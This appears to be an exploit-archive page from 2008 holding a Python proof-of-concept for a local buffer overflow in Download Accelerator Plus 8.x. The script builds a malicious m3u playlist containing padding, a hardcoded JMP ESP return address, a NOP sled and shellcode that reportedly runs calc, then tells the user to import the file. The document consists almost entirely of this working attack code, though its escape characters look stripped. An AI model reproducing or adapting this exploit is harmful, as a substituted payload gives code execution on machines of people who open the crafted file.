Home / exploits dap-overflow.txt
Posted on 10 July 2008
#!/usr/bin/python # Download Accelerator Plus - DAP 8.x (m3u) 0day Local Buffer Overflow Exploit # Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl> # Tested on: Download Accelerator Plus 8.6 / XP SP2 Polish # Shellcode: Windows Execute Command (calc) # Just for fun ;] ## from struct import pack shellcode = ( "x6ax22x59xd9xeexd9x74x24xf4x5bx81x73x13x8dx6cxf6" "xb2x83xebxfcxe2xf4x71x84xb2xb2x8dx6cx7dxf7xb1xe7" "x8axb7xf5x6dx19x39xc2x74x7dxedxadx6dx1dxfbx06x58" "x7dxb3x63x5dx36x2bx21xe8x36xc6x8axadx3cxbfx8cxae" "x1dx46xb6x38xd2xb6xf8x89x7dxedxa9x6dx1dxd4x06x60" "xbdx39xd2x70xf7x59x06x70x7dxb3x66xe5xaax96x89xaf" "xc7x72xe9xe7xb6x82x08xacx8exbex06x2cxfax39xfdx70" "x5bx39xe5x64x1dxbbx06xecx46xb2x8dx6cx7dxdaxb1x33" "xc7x44xedx3ax7fx4ax0exacx8dxe2xe5x9cx7cxb6xd2x04" "x6ex4cx07x62xa1x4dx6ax0fx97xdexeex6cxf6xb2") RET = 0x7CA58265 # JMP ESP (SHELL32.DLL / XP SP2 Polish) m3u = 'http://localhost/verify_me________________________________%s.mp3' buf = 'A' * 14074 buf += pack('<L', RET) buf += 'x90' * 32 buf += shellcode m3u %= buf fd = open('evil.m3u', 'wb') fd.write(m3u) fd.close() print 'DONE, import the evil.m3u and click "Verify"' # EoF
